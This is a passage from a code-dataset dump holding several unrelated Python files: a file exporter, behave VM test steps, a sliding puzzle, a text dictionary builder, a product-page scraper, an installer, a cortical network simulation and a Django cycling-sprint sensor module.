f:\n f.write(generate_header(COD_COOP, COD_PROD, NOME_PROD, DATA_ARQUIVO, 1))\n for ind in inf_f.index:\n f.write(generate_detalhe(\n inf_f.iloc[ind, 18],\n inf_f.iloc[ind, 3],\n inf_f.iloc[ind, 2],\n inf_f.iloc[ind, 5],\n COD_PROD,\n inf_f.iloc[ind, 1],\n TIPO_INFO,\n ANO_REF,\n inf_f.iloc[ind, 6],\n inf_f.iloc[ind, 7],\n inf_f.iloc[ind, 8],\n inf_f.iloc[ind, 9],\n inf_f.iloc[ind, 10],\n inf_f.iloc[ind, 11],\n inf_f.iloc[ind, 12],\n inf_f.iloc[ind, 13],\n inf_f.iloc[ind, 14],\n inf_f.iloc[ind, 15],\n inf_f.iloc[ind, 16],\n inf_f.iloc[ind, 17],\n inf_f.iloc[ind, 4],\n ind + 2\n ))\n counter += 1\n f.write(generate_trailler(len(inf_f), counter))\n f.close()\n\n","sub_path":"infacum_exporter.py","file_name":"infacum_exporter.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563140578","text":"import os\nimport subprocess\nfrom behave import *\nfrom hamcrest import *\n\n# Wait for a while, as we may be downloading the image as well\nVM_WAIT_TIME=60 * 10\nif os.getenv(\"CI\") is not None:\n DEFAULT_TRANSIENT_ARGS = [\"-ssh-timeout\", \"300\"]\n DEFAULT_QEMU_ARGS = [\"-m\", \"1G\", \"-smp\", \"2\"]\nelse:\n DEFAULT_TRANSIENT_ARGS = []\n DEFAULT_QEMU_ARGS = [\"-m\", \"1G\", \"-smp\", \"2\", \"-enable-kvm\", \"-cpu\", \"host\"]\n\ndef build_command(context):\n config = context.vm_config\n command = [\"transient\", *DEFAULT_TRANSIENT_ARGS]\n\n if \"name\" in config:\n command.extend([\"-name\", config[\"name\"]])\n\n if \"images\" in config:\n command.extend([\"-image\", *config[\"images\"]])\n\n if \"ssh-command\" in config:\n command.extend([\"-ssh-command\", config[\"ssh-command\"]])\n\n if \"ssh-console\" in config:\n command.extend([\"-ssh-console\"])\n\n if \"prepare-only\" in config:\n command.extend([\"-prepare-only\"])\n\n if \"image-frontend\" in config:\n command.extend([\"-image-frontend\", config[\"image-frontend\"]])\n\n if \"image-backend\" in config:\n command.extend([\"-image-backend\", config[\"image-backend\"]])\n\n if \"shared-folder\" in config:\n command.extend([\"-shared-folder\", *config[\"shared-folder\"]])\n\n if \"ssh-with-serial\" in config:\n command.extend([\"-ssh-with-serial\"])\n\n command.extend([\"--\", *DEFAULT_QEMU_ARGS])\n\n return command\n\ndef run_vm(context):\n command = build_command(context)\n handle = subprocess.Popen(command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n context.handle = handle\n return context.handle\n\ndef wait_on_vm(context, timeout=VM_WAIT_TIME):\n context.handle.wait(timeout)\n context.stdout = context.handle.stdout.read().decode('utf-8')\n context.stderr = context.handle.stderr.read().decode('utf-8')\n\n@given('a transient vm')\ndef step_impl(context):\n context.vm_config = {}\n\n@given('a name \"{name}\"')\ndef step_impl(context, name):\n context.vm_config[\"name\"] = name\n\n@given('a disk image \"{image}\"')\ndef step_impl(context, image):\n if \"images\" not in context.vm_config:\n context.vm_config[\"images\"] = [image]\n else:\n context.vm_config[\"images\"].append(image)\n\n@given('a ssh console')\ndef step_impl(context):\n context.vm_config[\"ssh-console\"] = True\n\n@given('a ssh-with-serial console')\ndef step_impl(context):\n context.vm_config[\"ssh-with-serial\"] = True\n\n@given('a ssh command \"{command}\"')\ndef step_impl(context, command):\n context.vm_config[\"ssh-command\"] = command\n\n@given('the vm is prepare-only')\ndef step_impl(context):\n context.vm_config[\"prepare-only\"] = 
True\n\n@given('a frontend \"{frontend}\"')\ndef step_impl(context, frontend):\n context.vm_config[\"image-frontend\"] = frontend\n\n@given('a backend \"{backend}\"')\ndef step_impl(context, backend):\n context.vm_config[\"image-backend\"] = backend\n\n@given('a sshfs mount of \"{}\"')\ndef step_impl(context, mount):\n if \"shared-folder\" not in context.vm_config:\n context.vm_config[\"shared-folder\"] = [mount]\n else:\n context.vm_config[\"shared-folder\"].append(mount)\n\n@when('the vm runs to completion')\n@when('the transient command is run')\ndef step_impl(context):\n run_vm(context)\n wait_on_vm(context)\n\n@when('the vm runs')\ndef step_impl(context):\n run_vm(context)\n\n@when('the vm is provided stdin')\ndef step_impl(context):\n text = context.text + \"\\n\"\n context.handle.stdin.write(text.encode('utf-8'))\n context.handle.stdin.close()\n\n@when('we wait for the vm to exit')\ndef step_impl(context):\n wait_on_vm(context)\n\n@then('the return code is {code}')\ndef step_impl(context, code):\n if context.handle.returncode != int(code):\n print(\"command stdout:\")\n print(context.stdout)\n print(\"command stderr:\")\n print(context.stderr)\n assert_that(context.handle.returncode, equal_to(int(code)))\n\n@then('stdout contains \"{expected_stdout}\"')\ndef step_impl(context, expected_stdout):\n assert_that(context.stdout, contains_string(expected_stdout))\n\n@then('the file \"{name}\" is in the backend')\ndef step_impl(context, name):\n items = os.listdir(context.vm_config[\"image-backend\"])\n assert_that(items, has_item(name))\n\n@then('the file \"{name}\" is in the frontend')\ndef step_impl(context, name):\n items = os.listdir(context.vm_config[\"image-frontend\"])\n assert_that(items, has_item(name))\n","sub_path":"test/features/steps/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"424682470","text":"# Sliding Puzzle\nimport random\n\nclass Reader :\n @staticmethod\n def get_number(size) :\n num = input(\"Type the number you want to move (Type 0 to quit): \")\n while not (num.isdigit() and 0 <= int(num) <= size * size - 1) :\n num = input(\"Type the number you want to move (Type 0 to quit): \")\n return int(num)\n\nclass SlidingBoard :\n def __init__(self, size) :\n self.__board = SlidingBoard.create_board(SlidingBoard.create_init_board(size))\n self.__empty = self.find_position(0)\n\n @property\n def board(self) :\n return self.__board\n\n @staticmethod\n def create_board(numbers) :\n board = []\n for r in range(4) :\n k = r * 4\n row = numbers[k:k+4]\n board.append(numbers[k:k+4])\n return board\n\n @staticmethod\n def create_init_board(size) :\n numbers = [n for n in range(size * size)]\n random.shuffle(numbers)\n return numbers\n\n @staticmethod\n def create_goal_board(size) :\n numbers = [n for n in range(size * size)]\n numbers[-1] = 0\n return numbers\n\n def find_position(self, num) :\n for i in range(len(self.__board)) :\n for j in range(len(self.__board)) :\n if num == self.__board[i][j] :\n return(i, j)\n\n def move(self, pos) :\n (x,y) = pos\n if self.__empty in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)) :\n self.__board[self.__empty[0]][self.__empty[1]] = self.__board[x][y]\n self.__board[x][y] = 0\n self.__empty = pos\n else:\n print(\"Can't move! 
Try again.\")\n\n def print_board(self) :\n print(\"S | 0 1 2 3\")\n print(\"- + -----------\")\n i = 0\n for row in self.__board :\n print(i, \"|\", end = ' ')\n for item in row :\n if item == 0:\n print(\" \", end = \" \")\n elif 10 <= item <= 15 :\n print(item,end = \" \")\n else :\n print(str(item).rjust(2),end=\" \")\n print()\n i += 1\n\nclass SlidingPuzzleController() :\n def __init__(self, size) :\n self.__slider = SlidingBoard(size)\n self.__goal = SlidingBoard.create_board(SlidingBoard.create_goal_board(size))\n self.__size = size\n\n def play(self) :\n while True:\n self.__slider.print_board()\n if self.__slider.board == self.__goal :\n print(\"Congratulations!\")\n break\n num = Reader.get_number(self.__size) # get number between 0 and 15\n if num == 0 :\n break\n pos = self.__slider.find_position(num)\n self.__slider.move(pos)\n print(\"Please come again.\")\n\ndef main() :\n import sys\n size = sys.argv[1]\n if size.isdigit() and int(size) > 1 :\n SlidingPuzzleController(int(size)).play()\n else :\n print(\"Not aproper system argument.\")\n\nmain()","sub_path":"[CSE1017] Programming-Basics/Practice/Practice 9.py","file_name":"Practice 9.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477177870","text":"import sys\nimport pickle\n\nfile_path = None\nout_path = None\nrum_dir_name = None\nnon_rum_dir_name = None\nif len(sys.argv) >= 5:\n file_path = sys.argv[1]\n out_path = sys.argv[2]\n rum_dir_name = sys.argv[3]\n non_rum_dir_name = sys.argv[4]\nelse:\n print(\"arguments not passed completely\")\n\n\ndef add_one_id_needed(cat_id, triad_list):\n if cat_id not in [single_triad[0] for single_triad in triad_list]:\n return triad_list + [(cat_id, 1)]\n else:\n new_triad_list = []\n\n for single_triad in triad_list:\n if single_triad[0] != cat_id:\n new_triad_list.append(single_triad)\n else:\n new_triad_list.append((single_triad[0], single_triad[1] + 1))\n\n return new_triad_list\n\n\nif file_path is not None:\n file = open(file_path, \"r\")\n file_content = file.read()\n file_rows = file_content.split(\"\\n\")\n\n # dictionary\n dictionary = {}\n\n number_of_docs = 0\n for row in file_rows:\n if len(row) > 0:\n if row[0] == \"/\":\n number_of_docs += 1\n\n # category-id pair uniques a document\n cat_id_pair = None\n for row in file_rows:\n if len(row) > 0:\n if row[0] == \"/\":\n split_row = row.split(\"/\")\n if rum_dir_name in split_row:\n cat_id_pair = (rum_dir_name, split_row[len(split_row) - 1])\n else:\n cat_id_pair = (non_rum_dir_name, split_row[len(split_row) - 1])\n else:\n for word in row.split():\n if word not in dictionary.keys():\n dictionary.update({\n word: {\n \"df\": 1,\n \"occurrences\": [\n (cat_id_pair, 1)\n ],\n \"nd\": number_of_docs\n }\n })\n else:\n df_increment_value = 0\n if cat_id_pair not in [triad[0] for triad in dictionary[word][\"occurrences\"]]:\n df_increment_value = 1\n\n dictionary.update({\n word: {\n \"df\": dictionary[word][\"df\"] + df_increment_value,\n \"occurrences\": add_one_id_needed(cat_id_pair, dictionary[word][\"occurrences\"]),\n \"nd\": number_of_docs\n }\n })\n file.close()\n\n out_file = open(out_path, \"wb\")\n pickle.dump(dictionary, out_file)\n out_file.close()\n","sub_path":"python_modules/create_dictionary.py","file_name":"create_dictionary.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
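The dictionary that create_dictionary.py pickles above maps each word to its document frequency ("df"), a list of ((category, doc_id), count) pairs ("occurrences"), and the total document count ("nd"). A short sketch of reading it back and deriving an inverse-document-frequency score from those stored fields; the pickle path is a placeholder for whatever out_path was passed to the script.

import math
import pickle

# Load the dictionary written by create_dictionary.py; "dictionary.pkl"
# is a placeholder for the out_path argument used there.
with open("dictionary.pkl", "rb") as f:
    dictionary = pickle.load(f)

for word, entry in dictionary.items():
    # entry["df"]: number of (category, id) documents containing the word
    # entry["nd"]: total number of documents seen while building
    idf = math.log(entry["nd"] / entry["df"])
    # entry["occurrences"] pairs each (category, doc_id) with a term count,
    # so the corpus-wide count of the word is just the sum of those counts.
    total_count = sum(count for (_cat_id_pair, count) in entry["occurrences"])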
+{"seq_id":"58657654","text":"#!/usr/bin/python\n# Programmer : zhuxp\n# Date: \n# Last-modified: 30 Jun 2012 01:15:18\nfrom xplib.Annotation import Bed\nimport types\ndef BedIterator(handle):\n if type(handle)==type(\"s\"):\n try:\n handle=open(handle,\"r\")\n except:\n raise ValueError(\"Can't open file %s\"%handle)\n for line in handle:\n line=line.strip()\n if line[0]==\"#\": continue\n x=line.split(\"\\t\")\n b=Bed(x)\n yield b\n return\n \n","sub_path":"lib/xplib/TableIO/BedIO.py","file_name":"BedIO.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629642785","text":"import pymysql\nimport os\nimport urllib.request\nimport sys\nimport requests\n\ndef get_prt_content_from_table():\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"suning\")\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n sql=\"select table_id,prt_id,prt_title,prt_desc from suning_prt_data\"\n try:\n cursor.execute(sql)\n data = cursor.fetchall()\n return data\n except Exception as err:\n db.rollback()\n print('---------------Error------Message--------:' + str(err))\n cursor.close()\n db.close()\n\ndef update_prt_content(table_id,content):\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"suning\")\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n sql = \"update suning_prt_data set prt_content='%s' where table_id='%s' \" %(content,table_id)\n try:\n cursor.execute(sql)\n db.commit()\n except Exception as err:\n db.rollback()\n print('---------update_prt_content------Error------Message--------:' + str(err))\n cursor.close()\n db.close()\n\nif __name__==\"__main__\":\n #从数据库获取整体的数据\n data=get_prt_content_from_table()\n for i in range(len(data)):\n #print(data[i])table_id,prt_id,prt_title,prt_desc\n table_id=data[i][0]\n prt_id=data[i][1]\n prt_title=data[i][2]\n prt_desc = data[i][3]\n\n #如何干掉prt_desc\n prt_text=prt_desc.split(\"introduceEdit=\")[-1].split('\" width')[0]\n print(prt_text)\n\n s=requests.get(prt_text)\n content = s.content.decode('utf-8')\n print(content)\n update_prt_content(table_id,content)\n\n\n","sub_path":"suning/苏宁后台/获取详情内容html.py","file_name":"获取详情内容html.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"625231431","text":"#!/usr/bin/python3\n\nimport os\nimport shutil\n\nbase_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"\")\n\ndef copy(fr: str, to: str, _file: bool=True):\n if not _file:\n shutil.copytree(base_dir + fr, to)\n else:\n shutil.copy2(base_dir + fr, to)\n print(f\"copy: {fr} => {to} done...\")\n\ntry:\n copy(\"kangaroo-app\", \"/usr/share/kangaroo-app\", False)\n copy(\"kangaroo-uninstall\", \"/usr/bin/\")\n copy(\"kangaroo\", \"/usr/bin/\")\n copy(\"kangaroo.desktop\", \"/usr/share/applications/\")\nexcept PermissionError:\n print(\"! 
PermissionError: run this script as root or use sudo\")\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649876713","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 29 15:26:04 2021\n\n@author: olive\n\"\"\"\n\n#------------------------------------------------------------------------------ \n# Necessary modules\n#------------------------------------------------------------------------------ \nfrom __future__ import division\n \nimport numpy as np\nimport matplotlib.pyplot as plt \nfrom numpy.random import normal as rnorm \n\np={} # Parameter dictionary\n#------------------------------------------------------------------------------ \n# Network Parameters\n#------------------------------------------------------------------------------ \n\np['beta_exc'] = 0.066 # Hz/pA\np['beta_inh'] = 0.351 # Hz/pA\n# Let us remember that we are keeping this as constant\np['tau_exc'] = 20 # ms # \np['tau_inh'] = 10 # ms\np['wEE'] = 24.3 # pA/Hz\np['wIE'] = 12.2 # pA/Hz\np['wEI'] = 19.7 # pA/Hz\np['wII'] = 12.5 # pA/Hz\np['muEE'] = 33.7 # pA/Hz\np['muIE'] = 25.3 # pA/Hz\np['eta'] = 0.68\n\n\n####### ROI = 29 areas ################ \n\nwith open(\"/home/olive/Desktop/LSN/Jog/distMatval.txt\") as f:\n contents=f.readlines()\nDISTmtx =np.array([[float(k) for k in i.split()] for i in contents]) \n\nwith open(\"/home/olive/Desktop/LSN/Jog/flnMatshuf2.txt\") as f:\n contents=f.readlines()\nFLN=np.array([[float(k) for k in i.split()] for i in contents]) \n\nareas=['V1','V2','V4','DP','MT','8m','5','8I','TEO','2','F1','STPc','7A','46d',\n '10','9/46v','9/46d','F5','TEpd','PBr','7m','7B','F2','STPi','PROm','F7',\n '8B','STPr','24c']\n\nhier=np.array([[0,0.2,0.45,0.5,0.51,0.55,0.58,0.6,0.61,0.63,0.67,\n 0.7,0.72,0.73,0.76,0.78,0.8,0.83,0.85,0.86,0.87,\n 0.95,0.96,0.965,0.97,0.98,0.985,0.99,1]])\n\np['hier_vals'] = hier\np['fln_mat']=FLN\np['areas']=areas\n\n \np['n_area']=len(p['areas'])\np['exc_scale'] = (1+p['eta']*p['hier_vals'])\n# Sign function\nfI = lambda x : x*(x>0) # f-I curve\n\n\n########### Choose the injection area\n\n\narea_act = 'V1'\nprint('Running network with stimulation to ' + area_act)\n\n \n# Definition of combined parameters\n\nlocal_EE = p['beta_exc'] * p['wEE'] * p['exc_scale']\nlocal_EI = -p['beta_exc'] * p['wEI']\nlocal_IE = p['beta_inh'] * p['wIE'] * p['exc_scale']\nlocal_II = -p['beta_inh'] * p['wII']\n\nfln_scaled = (p['exc_scale'] * p['fln_mat'].T).T\n\n\n\n#---------------------------------------------------------------------------------\n# Simulation Parameters\n#---------------------------------------------------------------------------------\n\n# White noise input parameters\n\nme=2\nSD=0.5 # Hz\n\n\n\ndt = 0.2 # ms\nT = 2500 # ms\nt_plot = np.linspace(0, T, int(T/dt)+1)\nn_t = len(t_plot)\n\nE_back=10 # Back-ground rate for excitation\nI_back=35 # Back-ground rate for inhibition\n\n# From target background firing inverts background inputs\nr_exc_tgt = E_back * np.ones(p['n_area'])\nr_inh_tgt = I_back * np.ones(p['n_area'])\n\nlongrange_E = np.dot(fln_scaled,r_exc_tgt)\nI_bkg_exc = r_exc_tgt - (local_EE*r_exc_tgt + local_EI*r_inh_tgt\n + p['beta_exc']*p['muEE']*longrange_E)\nI_bkg_inh = r_inh_tgt - (local_IE*r_exc_tgt + local_II*r_inh_tgt\n + p['beta_inh']*p['muIE']*longrange_E)\n\n# White noise stimulus input\n\nI_stim_exc = np.zeros((n_t,p['n_area']))\n\narea_stim_idx = p['areas'].index(area_act) # 
Index of stimulated area\narea_no_stim=tuple([i for i in range(p['n_area']) if i != area_stim_idx])\n#time_idx = (t_plot>100) & (t_plot<=350)\nI_stim_exc[:,area_stim_idx] = rnorm(0,0.5,n_t)\nI_stim_exc[:,area_no_stim] = rnorm(0,0.00005,(n_t,p['n_area']-1))\n# Above value chosen so that V1 is driven up to 100 Hz\n\n#---------------------------------------------------------------------------------\n# Storage\n#---------------------------------------------------------------------------------\n\nr_exc = np.zeros((n_t,p['n_area']))\nr_inh = np.zeros((n_t,p['n_area']))\n\n#---------------------------------------------------------------------------------\n# Initialization\n#---------------------------------------------------------------------------------\n\n# Set activity to background firing\nr_exc[0] = r_exc_tgt\nr_inh[0] = r_inh_tgt\n\n#---------------------------------------------------------------------------------\n# Running the network\n#---------------------------------------------------------------------------------\n\nfor i_t in range(1, n_t):\n longrange_E = np.dot(fln_scaled,r_exc[i_t-1])\n print(longrange_E)\n I_exc = (local_EE*r_exc[i_t-1] + local_EI*r_inh[i_t-1] +\n p['beta_exc'] * p['muEE'] * longrange_E +\n I_bkg_exc + I_stim_exc[i_t])\n \n I_inh = (local_IE*r_exc[i_t-1] + local_II*r_inh[i_t-1] +\n p['beta_inh'] * p['muIE'] * longrange_E + I_bkg_inh)\n\n d_r_exc = -r_exc[i_t-1] + fI(I_exc)\n d_r_inh = -r_inh[i_t-1] + fI(I_inh)\n\n r_exc[i_t] = r_exc[i_t-1] + d_r_exc * dt/p['tau_exc']\n r_inh[i_t] = r_inh[i_t-1] + d_r_inh * dt/p['tau_inh']\n\n\n##############################################################################\n########################### PLOTTING RESULTS #################################\n############################################################################## \n\n\n### Neural rate series plots\n\n_ = plt.figure(figsize=(4,4))\narea_name_list = p['areas']\narea_idx_list = [-1]+[p['areas'].index(name) for name in area_name_list]\nf, ax_list = plt.subplots(len(area_idx_list), sharex=True)\n\nfor ax, area_idx in zip(ax_list, area_idx_list):\n if area_idx < 0:\n y_plot = I_stim_exc[:, area_stim_idx]\n txt = 'Input'\n else:\n y_plot = r_exc[:,area_idx]\n txt = p['areas'][area_idx]\n\n y_plot = y_plot - y_plot.min()\n ax.plot(t_plot, y_plot)\n ax.text(0.9, 0.6, txt, transform=ax.transAxes)\n\n ax.set_yticks([y_plot.max()])\n ax.set_yticklabels(['{:0.4f}'.format(y_plot.max())])\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\nf.text(0.01, 0.5, 'Change in firing rate (Hz)', va='center', rotation='vertical')\nax.set_xlabel('Time (ms)')\n\n\n#########################################################################\n### Autocorrelation calculation, plots and exponential fits ############# \n#########################################################################\n## ACF of the ROIs are stacked as columns of numpy array\n\nimport statsmodels.api as sm \nfrom statsmodels.tsa.stattools import acf # For autocorrelation\nfrom scipy.optimize import curve_fit # For exponential curve fitting \n\n\n# Single exponential fit\ndef monoExp(x, tau):\n return np.exp(-tau * x) \n \n\n_ = plt.figure(figsize=(10,8)) \nnl=1000 # Lag index for autocorrelation\n\nACF=np.zeros((nl,p['n_area']))\nm=np.zeros(p['n_area'])\nTau_esti=np.zeros(p['n_area'])\n\ncols=['r','g','b','k'] # Colors for the plot\npara=(30) # Initial value for optimization\n\nfor k in range(p['n_area']):\n 
ACF[:,k]=acf(r_exc[:,k], nlags=nl-1)\n plt.plot(np.arange(nl)*dt,ACF[:,k],cols[k],label=p['areas'][k])\n \n # Cuve fitting\n params,_ = curve_fit(monoExp, np.arange(nl)*dt,ACF[:,k],para) \n #m[k]=params[0]\n Tau_esti[k]=params[0] \nplt.legend()\nplt.xlim(np.array([0, nl])*dt)\nplt.title(\"Autocorrelation of rate changes at different regions\",size=20)\nplt.xlabel(\"Lags (msec)\",size=14)\nplt.ylabel(\"Normalized Autocorrelation\",size=14)\n\n \n_ = plt.figure(figsize=(12,10)) \nfor k in range(p['n_area']):\n plt.subplot(int(str(22)+str(k+1)))\n plt.plot(np.arange(nl)*dt,ACF[:,k],label=\"ACF data\")\n plt.plot(np.arange(nl)*dt, \n monoExp(np.arange(nl)*dt,Tau_esti[k]),\n '--', label=\"fitted\")\n plt.title(p['areas'][k] + \"-- Esti. Tau: \"+ \n str(round(1/Tau_esti[k],2)) + \" msec\" ,size=20)\n \n \n\n\"\"\" \n################ Creation of BOLD resting state from the neural signals #####\n\n\n# Hemodynamic function\n\ndef Hemodynamic(n,TR,tauh=1.25*1e3,d=2.25*1e3):\n # f=[]\n # for k in range(n):\n # f.append((((k*TR)-d)*np.exp(((k*TR)-d)/tauh))/tauh**2)\n\n return [(((k*TR)-d)*np.exp(-((k*TR)-d)/tauh))/tauh**2 for k in range(n) if k!=0]\n \nplt.plot(Hemodynamic(100,2))\n\n############ COMPUTATION OF functional connectivity matrix ############\n\n \n\n \n\n# def AUTOcorr(x,lags=10):\n# M =len(x)\n# r =np.zeros(M) # One-sided autocorrelation\n \n# for i in range(M): \n# r[i]=(1/(M-i))*(sum(x[0:(M-i)] * x[i:M])) # Dot product in r\n \n# return(r[0:(lags+1)])\n \n\n# lgs=1000\n# AC1= AUTOcorr(r_exc[:,0],lgs)\n# AC2=AUTOcorr(r_exc[:,1],lgs)\n# plt.plot(AC1)\n# plt.plot(AC2/max(AC2))\n# plt.show()\n \n# lgs=1000\n# autocorrelation = np.correlate(r_exc[:,0], r_exc[:,0], mode=\"full\")\n# sm.graphics.tsa.plot_acf(r_exc[:,0], lags=lgs)\n# sm.graphics.tsa.plot_acf(r_exc[:,1], lags=lgs)\n# sm.graphics.tsa.plot_acf(r_exc[:,2], lags=lgs)\n\n#import matplotlib \n#matplotlib.pyplot.xcorr(r_exc[:,1], r_exc[:,1], normed=True, maxlags=1000)\n\n\n\n \n\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,0], nlags=nl-1),'r',label=p['areas'][0])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,1], nlags=nl-1),'g',label=p['areas'][1])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,2], nlags=nl-1),'b',label=p['areas'][2])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,3], nlags=nl-1),'k',label=p['areas'][3])\n# plt.legend()\n# plt.xlim(np.array([0, nl])*dt)\n# plt.title(\"Autocorrelation of rate changes at different regions\",size=20)\n#plt.ylim([0,1.1])\n\"\"\"\n","sub_path":"Simulation_29_ROIs_WhiteNoiseInput.py","file_name":"Simulation_29_ROIs_WhiteNoiseInput.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14311823","text":"from sys import platform as _platform\nfrom django.http.response import JsonResponse\nimport random\nfrom app.raspberry.sensors import write_sensor_data, read_sensors, RaspberrySensors\nfrom timeit import default_timer as timer\n#from app.goldsprint.dal import Dal\nfrom abc import abstractmethod, ABCMeta\nfrom app.goldsprint.sprint_helper import SprintHelper\nfrom app.models import Settings\n\nraspberry_sensors = None\ncurrent_sprint = None\ntest_environment = \"win\" in _platform or \"darwin\" in _platform\n\ndef start_up():\n if test_environment:\n print('----------test environment----------')\n else:\n print('----------real environment----------')\n write_sensor_data(None,None,True)\n global raspberry_sensors\n raspberry_sensors = RaspberrySensors()\n\n\ndef get_measure_data(request):\n if current_sprint is not 
None:\n return JsonResponse({'success': True, \n 'data': current_sprint.get_data(request)})\n return JsonResponse({'success': False})\n\ndef start_measure(request):\n if current_sprint is not None: \n current_sprint.start()\n return JsonResponse({'success': True, 'data': None})\n return JsonResponse({'success': False})\n\n\ndef setup_sprint(request):\n global current_sprint\n if current_sprint is None:\n current_sprint = ISprintObject.create(request)\n return JsonResponse({'success': True, \n 'data': [serializable_dict(x.__dict__) for x in current_sprint.sprinter_objects]})\n return JsonResponse({'success': False})\n\ndef setup_ride(request):\n global current_sprint\n if current_sprint is None:\n current_sprint = IRideObject.create(request)\n return JsonResponse({'success': True, \n 'data': [serializable_dict(x.__dict__) for x in current_sprint.sprinter_objects]})\n return JsonResponse({'success': False})\n\n\ndef serializable_dict(orig):\n d = dict(orig)\n del d['rs']\n return d\n\n\ndef finish_ride(request):\n global current_sprint\n if current_sprint is not None:\n for x in current_sprint.sprinter_objects:\n x.end = timer()\n x.finish_time = x.end - x.start\n #Dal.save_result(request, current_sprint.sprinter_objects, False)\n SprintHelper.save_result(request, current_sprint.sprinter_objects, False)\n current_sprint.dispose()\n current_sprint = None\n\n\ndef reset_sprint():\n global current_sprint\n if current_sprint is not None:\n current_sprint.dispose()\n current_sprint = None\n\n\n\nclass MeasureObject:\n def __init__(self, distance_goal, circumference, measure_interval, rs, sensor):\n \n self.rs = rs\n self.sensor = sensor\n if self.rs is not None:\n self.rs.subscribe(sensor, self)\n\n self.distance_goal = distance_goal\n self.circumference = circumference\n self.measure_interval = measure_interval\n \n\n self.count = 0\n self.prev_count = 0\n self.distance = 0\n \n self.start = None\n self.end = None\n self.finish_time = None\n\n self.speeds = []\n self.avg_speed = None\n self.max_speed = None\n \n self.revs = []\n self.avg_rev = None\n self.max_rev = None\n\n \n def start_timer(self):\n self.start = timer()\n\n def wheel_turned(self):\n if self.start is not None and self.end is None:\n self.count += 1\n self.distance += self.circumference\n if self.distance_goal is not None and self.distance >= self.distance_goal:\n self.end = timer()\n self.finish_time = self.end-self.start\n self.desubscribe()\n\n def get_measure(self, fake = None):\n if fake is not None:\n for i in range(fake):\n self.wheel_turned()\n\n if self.end is None:\n self.update()\n return {\n 'finishTime':self.finish_time,\n 'distance':self.distance,\n 'speeds':self.speeds,\n 'avgSpeed':self.avg_speed,\n 'maxSpeed':self.max_speed,\n 'revs':self.revs,\n 'avgRev':self.avg_rev,\n 'maxRev':self.max_rev\n }\n \n def desubscribe(self):\n if self.rs is not None:\n self.rs.desubscribe(self.sensor)\n\n def update(self):\n current_count = self.count - self.prev_count\n self.prev_count = self.count\n\n self.revs.append(current_count*1000/self.measure_interval)\n \n #speed formula\n #km: rev*circumference/1000000 -> for circumference being mm\n #h: 3600*(1sec/measuretime) -> measure time being milliseconds\n #calculating constants:3600*1000/1000000 = 3.6\n constant = 3.6\n current_speed = constant*current_count*self.circumference/self.measure_interval\n if current_speed < 0:\n current_speed = 0\n self.speeds.append(current_speed)\n \n try:\n stats = [self.revs[0],0,self.speeds[0],0]\n for i in range(1,len(self.revs)):\n stats[0] 
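The constant 3.6 in update() above is just the unit conversion made compact: distance per interval is count × circumference in mm, mm/ms equals m/s, and 1 m/s is 3.6 km/h. A tiny sketch making the units explicit, with an assumed wheel size:

# speed units behind the constant 3.6 used in update():
#   distance per interval = count * circumference   [mm]
#   mm / ms == m / s, and 1 m/s == 3.6 km/h
def speed_kmh(count: int, circumference_mm: float, interval_ms: float) -> float:
    return 3.6 * count * circumference_mm / interval_ms

# e.g. a 2096 mm road wheel turning 3 times per second:
assert abs(speed_kmh(3, 2096.0, 1000.0) - 22.6368) < 1e-9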
+= self.revs[i]\n if self.revs[i] > self.revs[stats[1]]:\n stats[1] = i\n stats[2] += self.speeds[i]\n if self.speeds[i] > self.speeds[stats[3]]:\n stats[3] = i\n self.avg_rev = stats[0]/len(self.revs)\n self.max_rev = self.revs[stats[1]]\n self.avg_speed = stats[2]/len(self.speeds)\n self.max_speed = self.speeds[stats[3]]\n except IndexError:\n pass\n\n\n#region SPRINT\n\nclass ISprintObject(metaclass=ABCMeta):\n def __init__(self):\n self.sprint_finished = False\n\n @abstractmethod\n def get_data(self, request):\n pass\n\n \n def dispose(self):\n for x in self.sprinter_objects:\n x.desubscribe()\n\n\n def start(self):\n for x in self.sprinter_objects:\n x.start_timer()\n\n def check_finish(self, request, measures):\n if not self.sprint_finished:\n sf = True\n for x in measures:\n if x['finishTime'] is None:\n sf = False\n if sf:\n self.sprint_finished = True\n #Dal.save_result(request, self.sprinter_objects)\n SprintHelper.save_result(request, 